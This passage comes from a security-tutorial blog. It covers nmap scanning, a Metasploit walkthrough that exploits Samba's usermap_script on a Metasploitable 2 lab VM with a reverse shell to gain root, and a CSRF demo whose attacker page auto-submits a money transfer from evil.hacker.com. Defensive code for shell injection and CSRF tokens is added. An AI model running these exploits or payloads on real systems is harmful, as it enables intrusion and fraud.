Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-13 19:53 IST<br />
Nmap scan report for meru.mycompany.com (192.168.122.1)<br />
Host is up (0.00031s latency).<br />
MAC Address: 52:54:00:8A:8D:BA (QEMU Virtual NIC)<br />
Nmap scan report for 192.168.122.73<br />
Host is up (0.00066s latency).<br />
MAC Address: 00:0C:29:FA:DD:2A (VMware)<br />
Nmap scan report for 192.168.122.115<br />
Host is up.<br />
Nmap done: 255 IP addresses (3 hosts up) scanned in 2.53 seconds<br />
<br />
<br />
<br />
2) <span style="color: blue;">UDP Port Scan.</span> UDP has no handshake, so nmap infers port state from what comes back: an ICMP port-unreachable means closed, an application-layer reply means open, and no response at all is reported as open|filtered, because a silent open service and a firewall dropping the probe look identical. UDP scans are slow (hosts rate-limit ICMP errors), and adding -sV sends protocol-specific payloads that can turn many open|filtered entries into a definite open.<br />
root@kali:~# <b>nmap -sU 192.168.122.73</b><br />
<br />
PORT STATE SERVICE<br />
53/udp open domain<br />
68/udp open|filtered dhcpc<br />
69/udp open|filtered tftp<br />
111/udp open rpcbind<br />
137/udp open netbios-ns<br />
138/udp open|filtered netbios-dgm<br />
2049/udp open nfs<br />
MAC Address: 00:0C:29:FA:DD:2A (VMware)<br />
<br />
<br />
3) <span style="color: blue;">TCP Connect Scan</span>. Uses the operating system's connect() call to complete the full three-way handshake with each port; if the connection is established, the port is open. Because the connection completes, the target's services see it and may log it. This is the scan type nmap falls back to when it is not run with raw-socket privileges.<br />
root@kali:~# <b>nmap -sT 192.168.122.1</b><br />
<br />
Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-13 19:33 IST<br />
Nmap scan report for meru.mycompany.com (192.168.122.1)<br />
Host is up (0.79s latency).<br />
Not shown: 981 filtered ports<br />
PORT STATE SERVICE<br />
21/tcp open ftp<br />
22/tcp open ssh<br />
25/tcp open smtp<br />
53/tcp open domain<br />
80/tcp open http<br />
<br />
<br />
4) <span style="color: blue;">TCP Stealth Scan (SYN scan)</span>. A single SYN is sent to each port: a SYN/ACK means open, a RST means closed, and no reply (or an ICMP unreachable) means filtered. Nmap tears the half-open connection down with a RST instead of completing it, so logging solutions that only record established connections see nothing. It needs raw-socket privileges and is nmap's default scan type when run as root, which is why the -sT and -sS results here look alike.<br />
root@kali:~# <b>nmap -sS 192.168.122.1</b><br />
<br />
Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-13 19:35 IST<br />
Nmap scan report for meru.mycompany.com (192.168.122.1)<br />
Host is up (0.00038s latency).<br />
Not shown: 981 filtered ports<br />
PORT STATE SERVICE<br />
21/tcp open ftp<br />
22/tcp open ssh<br />
25/tcp open smtp<br />
53/tcp open domain<br />
80/tcp open http<br />
88/tcp closed kerberos-sec<br />
<br />
<br />
<br />
5) <span style="color: blue;">Banner Grabbing</span> (with the Nmap Scripting Engine). The banner script connects to each open port and prints whatever the service announces on connect.<br />
root@kali:~# <b>nmap -sT 192.168.122.1 -p 22 --script=banner</b><br />
Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-13 19:40 IST<br />
Nmap scan report for meru.mycompany.com (192.168.122.1)<br />
Host is up (0.00032s latency).<br />
PORT STATE SERVICE<br />
22/tcp open ssh<br />
<span style="color: red;">|_banner: SSH-2.0-OpenSSH_6.4</span><br />
MAC Address: 52:54:00:8A:8D:BA (QEMU Virtual NIC)<br />
<br />
root@kali:~# <b>nmap -sT 192.168.122.73 -p 21 --script=banner</b><br />
<br />
Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-13 19:42 IST<br />
Nmap scan report for 192.168.122.73<br />
Host is up (0.00061s latency).<br />
PORT STATE SERVICE<br />
21/tcp open ftp<br />
<span style="color: red;">|_banner: 220 (vsFTPd 2.3.4)</span><br />
<br />
<br />
6) <span style="color: blue;">Service Identification</span> (version detection). -sV sends protocol-specific probes and matches the responses against nmap's service fingerprints, which also works for services that print no banner.<br />
root@kali:~# <b>nmap -sV -p 80 192.168.122.1</b><br />
<br />
Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-13 19:44 IST<br />
Nmap scan report for meru.mycompany.com (192.168.122.1)<br />
Host is up (0.00059s latency).<br />
PORT STATE SERVICE VERSION<br />
80/tcp open http <span style="color: red;">Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16)</span><br />
<br />
<br />
7) <span style="color: blue;">O.S. identification.</span> -O fingerprints the target's TCP/IP stack behaviour; it needs at least one open and one closed port on the target for a reliable guess.<br />
root@kali:~# <b>nmap -O 192.168.122.1</b><br />
Device type: general purpose<br />
<span style="color: red;">Running: Linux 2.6.X|3.X</span><br />
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3<br />
<span style="color: red;">OS details: Linux 2.6.32 - 3.10</span><br />
Network Distance: 1 hop<br />
<br />
<br />
8) <span style="color: blue;">Identify filtering on ports (ACK scan).</span> The ACK scan never reports open or closed. A RST reply means the port is <i>unfiltered</i>: the probe reached the host, but whether the port is open or closed is not determined. No reply, or an ICMP unreachable, means <i>filtered</i>: a stateful firewall is dropping packets that do not belong to a tracked connection. Compare with the SYN scan above: port 22 on 192.168.122.1 is open, yet the ACK scan reports it filtered, which is consistent with a stateful firewall in front of it.<br />
root@kali:~# <b>nmap -sA 192.168.122.1 -p 22</b><br />
<br />
Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-14 10:30 IST<br />
Nmap scan report for meru.mycompany.com (192.168.122.1)<br />
Host is up (0.00038s latency).<br />
PORT STATE SERVICE<br />
<span style="color: red;">22/tcp filtered ssh</span><br />
<br />
<br />
root@kali:~# <b>nmap -sA 192.168.100.1 -p 22</b><br />
<br />
Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-14 10:37 IST<br />
Nmap scan report for 192.168.100.1<br />
Host is up (0.00092s latency).<br />
PORT STATE SERVICE<br />
<span style="color: red;">22/tcp unfiltered ssh</span><br />
<br />
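Scan output is most useful when it is kept and compared over time. As an added Python example (not part of the original post or of nmap), here is a parser for nmap's normal output format as shown above, plus a diff that reports ports newly open or newly closed between two runs. BASELINE_SCAN reuses results from this post; CURRENT_SCAN is a constructed later scan of the same hosts, with the 3306/tcp entry and the version strings made up for the illustration.<br />

```python
import re

# BASELINE_SCAN reproduces output shown in this post. CURRENT_SCAN is a
# constructed later run against the same hosts; the mysql port and the
# version strings are invented to exercise the diff.
BASELINE_SCAN = """\
Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-13 19:35 IST
Nmap scan report for meru.mycompany.com (192.168.122.1)
Host is up (0.00038s latency).
Not shown: 981 filtered ports
PORT   STATE  SERVICE
21/tcp open   ftp
22/tcp open   ssh
25/tcp open   smtp
53/tcp open   domain
80/tcp open   http
88/tcp closed kerberos-sec
Nmap scan report for 192.168.122.73
Host is up (0.00066s latency).
PORT     STATE         SERVICE
53/udp   open          domain
68/udp   open|filtered dhcpc
111/udp  open          rpcbind
2049/udp open          nfs
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Nmap done: 2 IP addresses (2 hosts up) scanned in 1.10 seconds
"""

CURRENT_SCAN = """\
Nmap scan report for meru.mycompany.com (192.168.122.1)
Host is up (0.00041s latency).
PORT     STATE  SERVICE      VERSION
21/tcp   closed ftp
22/tcp   open   ssh          OpenSSH 6.4 (protocol 2.0)
25/tcp   open   smtp
53/tcp   open   domain
80/tcp   open   http         Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16)
88/tcp   closed kerberos-sec
3306/tcp open   mysql
Nmap scan report for 192.168.122.73
Host is up (0.00070s latency).
PORT     STATE         SERVICE
53/udp   open          domain
68/udp   open|filtered dhcpc
111/udp  open          rpcbind
2049/udp open          nfs
"""

# "Nmap scan report for name (ip)" or "Nmap scan report for ip"
HOST_RE = re.compile(
    r"^Nmap scan report for (?:(?P<name>\S+) \()?(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\)?$"
)
# "80/tcp open http Apache httpd ..." ; state may be a compound like open|filtered
PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>[\w|]+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*\S))?\s*$"
)


def parse_nmap_normal(text):
    """Return {ip: {"name": hostname-or-None, "ports": {"21/tcp": (state, service, version)}}}."""
    hosts, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        host = HOST_RE.match(line)
        if host:
            current = host.group("ip")
            hosts[current] = {"name": host.group("name"), "ports": {}}
            continue
        port = PORT_RE.match(line)
        if port and current:
            key = f"{port['port']}/{port['proto']}"
            hosts[current]["ports"][key] = (port["state"], port["service"], port["version"] or "")
    return hosts


def open_ports(hosts):
    """Set of (ip, port/proto) that are definitely open; open|filtered is excluded."""
    return {
        (ip, key)
        for ip, host in hosts.items()
        for key, (state, _service, _version) in host["ports"].items()
        if state == "open"
    }


def diff_scans(baseline_text, current_text):
    """Return (newly_open, no_longer_open) as sorted lists of (ip, port/proto)."""
    before = open_ports(parse_nmap_normal(baseline_text))
    after = open_ports(parse_nmap_normal(current_text))
    return sorted(after - before), sorted(before - after)


if __name__ == "__main__":
    newly_open, gone = diff_scans(BASELINE_SCAN, CURRENT_SCAN)
    print("newly open:", newly_open)
    print("no longer open:", gone)
```

For real work, nmap's -oX (XML) or -oG (grepable) output is more robust to parse; this parser handles the human-readable form because that is what usually ends up pasted into notes and tickets. Treating open|filtered as "not open" keeps UDP noise out of the diff, at the cost of missing a UDP service that silently opened.<br />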
</div>
<b>Metasploitable2: Hack Samba Server and get root access</b> (Shabbir Rangwala, 2015-06-13)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. It runs on VMware, VirtualBox and other common virtualization platforms.<br />
<br />
We have installed 'Metasploitable 2' and Kali Linux as Virtual Machines in KVM in CentOS7. <span style="color: black;">For Instructions on how to install Metasploitable 2 Virtual Machine in KVM</span>, refer to this <a href="http://linux-hacking-guide.blogspot.in/2015/05/convert-vmware-virtual-machine-to-kvm.html" target="_blank">post.</a><br />
<br />
In a <a href="http://linux-hacking-guide.blogspot.in/2015/05/metasploitable2-vulnerability-scanning.html" target="_blank">previous post</a>, we carried out a vulnerability scan of the Metasploitable 2 virtual machine using OpenVAS in Kali Linux. <br />
<br />
In this post, we exploit the Samba server on Metasploitable 2 using Metasploit in Kali Linux. <br />
<br />
We have the following scenario:<br />
<br />
Metasploitable2 IP Address: 192.168.122.73<br />
Kali Linux IP Address: 192.168.122.115<br />
<br />
Perform the following steps on the Kali Linux machine:<br />
<br />
1) We perform a port scan on the Metasploitable machine and see that the samba port is open.<br />
root@kali:~# <b>nmap 192.168.122.73</b><br />
Nmap scan report for 192.168.122.73<br />
Host is up (0.00080s latency).<br />
Not shown: 977 closed ports<br />
PORT STATE SERVICE<br />
21/tcp open ftp<br />
22/tcp open ssh<br />
23/tcp open telnet<br />
25/tcp open smtp<br />
53/tcp open domain<br />
80/tcp open http<br />
111/tcp open rpcbind<br />
<span style="color: red;">139/tcp open netbios-ssn</span><br />
445/tcp open microsoft-ds<br />
<br />
<br />
2) Start Metasploit and search for Samba modules. The module we use abuses Samba's 'username map script' smb.conf option: the username supplied during session setup is handed to a shell without escaping, so shell metacharacters in the username run arbitrary commands with the privileges of the Samba daemon.<br />
root@kali:~# <b>msfconsole</b><br />
msf ><b> search samba</b><br />
<span style="color: red;">exploit/multi/samba/usermap_script 2007-05-14 excellent Samba "username map script" Command Execution</span><br />
<br />
<br />
msf > <b>use exploit/multi/samba/usermap_script</b> <br />
<br />
msf exploit(usermap_script) > <b>show options</b><br />
<br />
Module options (exploit/multi/samba/usermap_script):<br />
<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
RHOST yes The target address<br />
RPORT 139 yes The target port<br />
<br />
<br />
msf exploit(usermap_script) > <b>set RHOST 192.168.122.73</b><br />
RHOST => 192.168.122.73<br />
<br />
<br />
msf exploit(usermap_script) > <b>show payloads</b><br />
<b><br /></b>
<br />
We will select a payload in which the remote host connects back to our (attacker) system.<br />
<br />
msf exploit(usermap_script) > <b>set PAYLOAD cmd/unix/reverse</b><br />
PAYLOAD => cmd/unix/reverse<br />
<br />
msf exploit(usermap_script) > <b>show options</b><br />
<br />
Module options (exploit/multi/samba/usermap_script):<br />
<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
RHOST 192.168.122.73 yes The target address<br />
RPORT 139 yes The target port<br />
<br />
<br />
Payload options (cmd/unix/reverse):<br />
<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
LHOST 192.168.122.115 yes The listen address<br />
LPORT 4444 yes The listen port<br />
<br />
<br />
Many corporate environments restrict outbound connections with a firewall, so we have the target connect back on port 443 (the HTTPS port), which is almost always allowed outbound. Binding a port below 1024 for the listener is fine here because we run Metasploit as root. <br />
<br />
msf exploit(usermap_script) > <b>set LPORT 443</b><br />
LPORT => 443<br />
msf exploit(usermap_script) > <b>exploit</b><br />
<br />
[*] Started reverse double handler<br />
[*] Accepted the first client connection...<br />
[*] Accepted the second client connection...<br />
[*] Command: echo ol88NmbSO30AG07L;<br />
[*] Writing to socket A<br />
[*] Writing to socket B<br />
[*] Reading from sockets...<br />
[*] Reading from socket B<br />
[*] B: "ol88NmbSO30AG07L\r\n"<br />
[*] Matching...<br />
[*] A is input...<br />
[*] Command shell session 2 opened<span style="color: red;"> (192.168.122.115:443 -> 192.168.122.73:46632)</span> at 2015-06-13 14:35:45 +0530<br />
<br />
<b>whoami</b><br />
root<br />
<br />
<br />
We now have root access on the target machine. The shell runs as root because the command was injected into smbd, which runs as root on Metasploitable 2.<br />
<br />
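The root cause the usermap_script module exploits, shown as an added Python example that is neither Samba's code nor the Metasploit module's: a username pasted into a shell command string, beside the same call made safely, plus a check for the smb.conf directive that enables the code path. The <b>echo</b> stand-in for the map script, the smb.conf fragments and the script path in them are constructed for the illustration.<br />

```python
import shlex
import subprocess

# Stand-in for the 'username map script' that smb.conf can point at. A real one
# maps Windows usernames to Unix accounts; 'echo' just shows what the shell ran.
MAP_SCRIPT = "echo"


def map_user_vulnerable(username):
    """Build a command line by pasting the username in and hand it to /bin/sh.

    This is the pattern the usermap_script module abuses: characters such as
    ';' or backticks inside the username are parsed by the shell, so the
    attacker's text after them runs as a second command.
    """
    command = f"{MAP_SCRIPT} {username}"
    return subprocess.run(command, shell=True, capture_output=True, text=True).stdout


def map_user_hardened(username):
    """Run the script directly with the username as one argv element.

    No shell is involved, so nothing interprets metacharacters.
    """
    return subprocess.run([MAP_SCRIPT, username], capture_output=True, text=True).stdout


def map_user_quoted(username):
    """If a shell command string is unavoidable, quote the untrusted part."""
    command = f"{MAP_SCRIPT} {shlex.quote(username)}"
    return subprocess.run(command, shell=True, capture_output=True, text=True).stdout


def username_map_script_setting(smb_conf_text):
    """Return the active 'username map script' value from an smb.conf, or None.

    Lines beginning with '#' or ';' are comments in smb.conf.
    """
    for line in smb_conf_text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", ";")):
            continue
        key, sep, value = line.partition("=")
        if sep and key.strip().lower() == "username map script":
            return value.strip()
    return None


# Constructed smb.conf fragments; the script path is made up.
SMB_CONF_EXPOSED = """\
[global]
   workgroup = WORKGROUP
   username map script = /etc/samba/mapuser.sh
"""
SMB_CONF_FIXED = """\
[global]
   workgroup = WORKGROUP
   ; username map script = /etc/samba/mapuser.sh
"""

# A benign username of the same shape the exploit uses: text that ends the
# intended command and starts another.
INJECTED_USERNAME = "nobody; echo INJECTED"

if __name__ == "__main__":
    print("vulnerable:", repr(map_user_vulnerable(INJECTED_USERNAME)))
    print("hardened:  ", repr(map_user_hardened(INJECTED_USERNAME)))
    print("quoted:    ", repr(map_user_quoted(INJECTED_USERNAME)))
    print("smb.conf setting:", username_map_script_setting(SMB_CONF_EXPOSED))
```

The vulnerable form prints two lines because the shell ran two commands; the other two print the username verbatim. For the Samba server itself the remedy is a patched Samba release, or removing the username map script option as in SMB_CONF_FIXED; the hardened functions show the general pattern to apply in any code that builds commands from network-supplied names.<br />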
<br /></div>
<b>Cross-Site Request Forgery Attack: Example Application</b> (Shabbir Rangwala, 2015-06-12)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
In a cross-site request forgery (CSRF) attack, the attacker creates an innocuous-looking web page that causes the victim's browser to submit a request directly to the vulnerable application, performing an action the victim did not intend.<br />
<br />
In this tutorial, we develop a web application that has a CSRF vulnerability. When a user logs in, the application creates a session for him that is identified only by a cookie. The attacker hosts a malicious page; when the logged-in user opens its link, the page's script submits a request that performs a privileged operation (a money transfer) on the vulnerable application, with the user's cookies attached by the browser.<br />
<br />
<br />
Victim Web Server Name: <span style="color: red;">meru.mycompany.com</span><br />
Attacker Web Server : <span style="color: red;">evil.hacker.com </span><br />
<br />
<br />
1) The user logs in to the application at the URL <span style="color: red;">http://meru.mycompany.com/login.php</span>, entering username and password. On successful authentication a session is created for the user, who is then redirected to the URL <span style="color: red;">http://meru.mycompany.com/transfer.php</span>. <br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfBffvaGIDe6XcJ9QzkD-Ayp7U5sVcGiywOaUhdjl_7Hpch01QhyphenhyphenRtbIyVwAMckwVoV3mBU8hWUQTj8h-I4b2coJhMeMYg6Jk7c0qWQYqm7od73_pJcZ3sdHZKRDGhe9ahJWUbGaaO_aV3/s1600/Screenshot+from+2015-06-09+23%253A02%253A47.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfBffvaGIDe6XcJ9QzkD-Ayp7U5sVcGiywOaUhdjl_7Hpch01QhyphenhyphenRtbIyVwAMckwVoV3mBU8hWUQTj8h-I4b2coJhMeMYg6Jk7c0qWQYqm7od73_pJcZ3sdHZKRDGhe9ahJWUbGaaO_aV3/s400/Screenshot+from+2015-06-09+23%253A02%253A47.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
2) On the page '<span style="color: red;">transfer.php</span>' , the user specifies the account no. of the recipient and the amount to transfer. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-B6FNmfmbIp1_YDnvjt_cJJfSsM7jol6KTYfHTK6FAzRcuve-UMiZmozs_h-skGAFtcwHZCDmERDFy4eJqyJ2wwUGYTqovWLhoAQDMV5kO7Q8J07hBaGUZWYKZ7kOVgW1kT3iIm_MmwC1/s1600/Screenshot+from+2015-06-12+11%253A47%253A21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-B6FNmfmbIp1_YDnvjt_cJJfSsM7jol6KTYfHTK6FAzRcuve-UMiZmozs_h-skGAFtcwHZCDmERDFy4eJqyJ2wwUGYTqovWLhoAQDMV5kO7Q8J07hBaGUZWYKZ7kOVgW1kT3iIm_MmwC1/s400/Screenshot+from+2015-06-12+11%253A47%253A21.png" width="400" /></a></div>
<br />
The page '<span style="color: red;">transfer.php</span>' contains the following code:<br />
<br />
<?php<br />
<span style="color: blue;">session_start();</span><br />
?><br />
<html><br />
<body><br />
<?php<br />
<span style="color: blue;">if(!isset($_SESSION['loginid'])){</span><br />
echo "please login";<br />
}else{<br />
?><br />
<h2>Enter Transaction details</h2><span style="color: blue;"> </span><br />
<span style="color: blue;"><form action="perform.php" method="post"></span><br />
<label>To account no:</label><br />
<<span style="color: blue;">input type="text" name="daccount" /> <span style="color: #444444;"><br/></span></span><br />
<label>Transfer Amount:</label><span style="color: blue;"> </span><br />
<span style="color: blue;"><input type="text" name="amount" /> <span style="color: #444444;"><br/></span></span><br />
<input type="submit" name="submit" value="submit"/><br />
</form><br />
<?php<br />
}<br />
?><br />
</body><br />
</html><br />
<br />
<br />
<span style="color: black;">We can see that the above code is vulnerable to CSRF attack because of the following reasons:</span><br />
<span style="color: black;">a) The application relies solely on HTTP cookies for tracking sessions.</span><br />
<span style="color: black;">b) The attacker can determine all the parameters required to perform the action.</span><br />
<span style="color: black;"><br /></span>
3) The attacker constructs a web page '<span style="color: red;">http://evil.hacker.com/attacker.php</span>' that makes a cross-domain request to the vulnerable application containing everything needed to perform the privileged action, as shown below:
<br />
<br />
<span style="color: #444444;"><html></span><br />
<span style="color: #444444;"><body></span><br />
<span style="color: blue;"><form action="http://meru.mycompany.com/perform.php" method="post"></span><br />
<span style="color: blue;"><span style="background-color: white;"><input type="hidden" name="daccount" value="1050" /> <br/></span></span><br />
<span style="color: blue;"><span style="background-color: white;"><input type="hidden" name="amount" value="1000" /> <br/></span></span><br />
<span style="color: #444444;"></form></span><br />
<span style="color: blue;"><script>document.forms[0].submit();</span><br />
<span style="color: #444444;"></script></span><br />
<span style="color: #444444;"></body></span><br />
<span style="color: #444444;"></html></span><br />
<br />
<br />
The attack page places all the parameters of the request into hidden form fields and contains a script that submits the form automatically as soon as the page loads.<br />
<br />
4) The attacker puts this page on his web server and tricks the user into clicking on the link <span style="color: red;">http://evil.hacker.com/attacker.php<span style="color: black;">, while the user is already logged-in to the vulnerable application.</span></span><br />
<br />
When the user's browser submits the form, it automatically attaches the user's cookies for the target domain, so the vulnerable application processes the request exactly as if the user had filled in the transfer form, and the money is transferred to the attacker's account. (Chromium-based browsers now treat a cookie with no SameSite attribute as SameSite=Lax and do not send it on a cross-site POST like this one; an application should not rely on that default but set the attribute explicitly and, above all, verify an anti-CSRF token.)<br />
<br />
<br />
The attacker can also load the attack page inside an invisible <i>iframe</i>, as shown below. The advantage is that the response from the victim server is rendered inside the zero-size frame, so the user sees nothing unusual and does not notice the attack.<br />
<br /><span style="color: red;">iframe_attack.php</span> <br />
<html><br />
<body><br />
<iframe height="0" width="0" src='<span style="color: red;">http://evil.hacker.com/attacker.php</span>'></iframe><br />
</body><br />
</html><br />
<br />
In the above case, the user has to click on <span style="color: red;">http://evil.hacker.com/iframe_attack.php.</span><br />
<br />
<br />
5) The source code for the application is given below:<br />
<br />
<span style="color: red;">login.php</span><br />
<?php<br />
session_start(); // must run before $_SESSION is read<br />
<br />
if(!isset($_SESSION['loginid'])){<br />
if(isset($_POST['submit'])){<br />
$loginid = $_POST['loginid'];<br />
$passwd = $_POST['passwd'];<br />
<br />
$conn = new mysqli('localhost','shabbir','shabbir','mybank');<br />
if($conn->connect_error){<br />
die('error connecting to server' . $conn->connect_error);<br />
}<br />
<br />
// prepared statement: the login form is not the flaw this post is about, so keep SQL injection out of it<br />
// (the password is still compared in clear text, as in the original; a real application stores a hash)<br />
$stmt = $conn->prepare("select custname from customer where loginid = ? and passwd = ?");<br />
$stmt->bind_param('ss', $loginid, $passwd);<br />
$stmt->execute();<br />
$result = $stmt->get_result();<br />
<br />
if ($result->num_rows == 1){<br />
$row = $result->fetch_assoc();<br />
$_SESSION['loginid'] = $loginid;<br />
$_SESSION['custname'] = $row['custname'];<br />
$conn->close();<br />
header('Location: transfer.php');<br />
exit; // stop here, otherwise the login page is still sent after the redirect header<br />
}<br />
$error_msg="invalid username or password.\n";<br />
<br />
$conn->close();<br />
}<br />
}<br />
?><br />
<br />
<br />
<html><br />
<head><br />
<title>Welcome to mybank</title><br />
</head><br />
<br />
<body><br />
<h2>Enter login details</h2><br />
<?php<br />
if(! empty($error_msg)){<br />
echo "<strong>" . $error_msg . "</strong><br/>";<br />
}<br />
?><br />
<br />
<form action="login.php" method="post"><br />
<br />
<label>Login id:</label><br />
<input type="text" name="loginid" /> <br/><br />
<br />
<label>Password:</label><br />
<input type="password" name="passwd" /> <br/><br />
<br />
<input type="submit" name="submit" value="submit"/><br />
</form><br />
</body><br />
</html><br />
<br />
<br />
<span style="color: red;">perform.php</span><br />
<?php<br />
session_start();<br />
if(!isset($_SESSION['loginid'])){<br />
echo "please login";<br />
}else{<br />
// No anti-CSRF token is checked here. That is the flaw this post demonstrates:<br />
// any page that makes the victim's browser POST daccount and amount gets the transfer done.<br />
$daccount = $_POST['daccount'];<br />
$amount = $_POST['amount'];<br />
$loginid = $_SESSION['loginid'];<br />
<br />
if(!is_numeric($amount) || $amount <= 0){<br />
die("invalid amount");<br />
}<br />
<br />
$conn = new mysqli('localhost','shabbir','shabbir','mybank');<br />
if($conn->connect_error){<br />
die('error connecting to server' . $conn->connect_error);<br />
}<br />
<br />
// source account: the logged-in customer<br />
$stmt = $conn->prepare("select balance from customer where loginid = ?");<br />
$stmt->bind_param('s', $loginid);<br />
$stmt->execute();<br />
$result = $stmt->get_result();<br />
if($result->num_rows == 0){<br />
die("source account not found");<br />
}<br />
$sbalance = $result->fetch_assoc()['balance'] - $amount;<br />
<br />
// destination account: taken from the (forgeable) POST body<br />
$stmt = $conn->prepare("select balance from customer where accountno = ?");<br />
$stmt->bind_param('s', $daccount);<br />
$stmt->execute();<br />
$result = $stmt->get_result();<br />
if($result->num_rows == 0){<br />
die("destination account not found");<br />
}<br />
$dbalance = $result->fetch_assoc()['balance'] + $amount;<br />
<br />
$stmt = $conn->prepare("update customer set balance = ? where loginid = ?");<br />
$stmt->bind_param('ds', $sbalance, $loginid);<br />
if($stmt->execute()){<br />
echo "debited; new balance " . $sbalance . "<br/>";<br />
}else{<br />
echo "error querying database " . $conn->error;<br />
}<br />
$stmt = $conn->prepare("update customer set balance = ? where accountno = ?");<br />
$stmt->bind_param('ds', $dbalance, $daccount);<br />
if($stmt->execute()){<br />
echo "credited; new balance " . $dbalance . "<br/>";<br />
}else{<br />
echo "error querying database " . $conn->error;<br />
}<br />
<br />
$conn->close();<br />
}<br />
?><br />
<br />
<br />
<br />
<br />
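The fix for perform.php, as an added example that is not part of the original application: a synchronizer token issued per session and checked on every state-changing POST, with an Origin/Referer check as a second layer. It is written in Python rather than the application's PHP so the logic can be read and run on its own; the <b>session</b> dict stands in for $_SESSION, the <b>post</b> dict for $_POST, and TRUSTED_ORIGIN is assumed to be the application's own origin.<br />

```python
import hmac
import secrets
from urllib.parse import urlparse

# The application's own origin; the attacker's page lives on evil.hacker.com.
TRUSTED_ORIGIN = "http://meru.mycompany.com"


def issue_csrf_token(session):
    """Create one unguessable token per login session and keep it server-side."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_hex(32)
    return session["csrf_token"]


def render_transfer_form(session):
    """The transfer.php form from the post with the token in a hidden field.

    The attacker's page cannot read this field: the same-origin policy stops
    a page on evil.hacker.com from reading a response from meru.mycompany.com,
    so attacker.php cannot include a valid token in its forged POST.
    """
    token = issue_csrf_token(session)
    return (
        '<form action="perform.php" method="post">\n'
        f'<input type="hidden" name="csrf_token" value="{token}" />\n'
        '<label>To account no:</label>\n<input type="text" name="daccount" />\n'
        '<label>Transfer Amount:</label>\n<input type="text" name="amount" />\n'
        '<input type="submit" name="submit" value="submit"/>\n'
        "</form>"
    )


def origin_allowed(headers):
    """Defence in depth: the browser-supplied Origin (or Referer) must be our site.

    Browsers set Origin on cross-site POSTs and page scripts cannot forge it.
    Requests carrying neither header are refused rather than trusted.
    """
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parsed = urlparse(source)
    return f"{parsed.scheme}://{parsed.netloc}" == TRUSTED_ORIGIN


def handle_perform(session, headers, post):
    """perform.php's decision logic with CSRF checks in front of the transfer.

    `session` is the server-side session ($_SESSION), `headers` the request
    headers, `post` the submitted form fields ($_POST).
    """
    if "loginid" not in session:
        return "please login"
    expected = session.get("csrf_token")
    supplied = post.get("csrf_token", "")
    # constant-time comparison so the token cannot be guessed byte by byte
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return "rejected: missing or invalid CSRF token"
    if not origin_allowed(headers):
        return "rejected: request did not originate from this site"
    try:
        amount = int(post["amount"])
    except (KeyError, ValueError):
        return "rejected: bad amount"
    if amount <= 0:
        return "rejected: bad amount"
    return f"transferred {amount} to account {post.get('daccount', '')}"


if __name__ == "__main__":
    victim = {"loginid": "victim"}
    token = issue_csrf_token(victim)
    own_site = {"Origin": TRUSTED_ORIGIN}
    print(handle_perform(victim, own_site, {"csrf_token": token, "daccount": "1050", "amount": "1000"}))
    # attacker.php from the post: hidden fields only, no token, foreign origin
    print(handle_perform(victim, {"Origin": "http://evil.hacker.com"}, {"daccount": "1050", "amount": "1000"}))
```

In PHP the same pattern is bin2hex(random_bytes(32)) stored in $_SESSION when the form is rendered, and hash_equals() against the POSTed value in perform.php before any database work; the session cookie should additionally be set with SameSite=Lax or Strict. Note the order of checks: the token is verified before the Origin header, because the token is the control that does not depend on what the browser chooses to send.<br />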
<br /></div>
<b>Session Hijacking using Stored XSS: Example Application</b> (Shabbir Rangwala, 2015-06-12)<div dir="ltr" style="text-align: left;" trbidi="on">
Session hijacking occurs when an attacker captures a session token
and injects it into their own browser to gain access to the victim's
authenticated session.<br />
<br />
There are some limitations to session hijacking attacks:<br />
1) HTTPS on its own does not prevent this attack. TLS stops an eavesdropper from sniffing the cookie off the wire, but a script running in the victim's page reads <span style="color: red;">document.cookie</span> over HTTPS just as well. What blocks the theft shown here is the HttpOnly cookie flag, which hides the cookie from JavaScript (the Secure flag keeps it off plain HTTP).<br />
2) Most sessions are invalidated on the server when the target logs out. This logs the attacker out as well.<br />
3) Many websites do not support parallel logins, which negates the use of a stolen cookie.<br />
<br />
In this tutorial, we will see how to steal session cookie using Stored Cross-Site Scripting Attack.<br />
<br />
Stored cross-site scripting arises when data submitted by one user is stored in the application (typically in a database) and then is displayed to other users without being filtered appropriately.<br />
<br />
Attacks against Stored XSS vulnerabilities typically involve at least two requests to the application.<br />
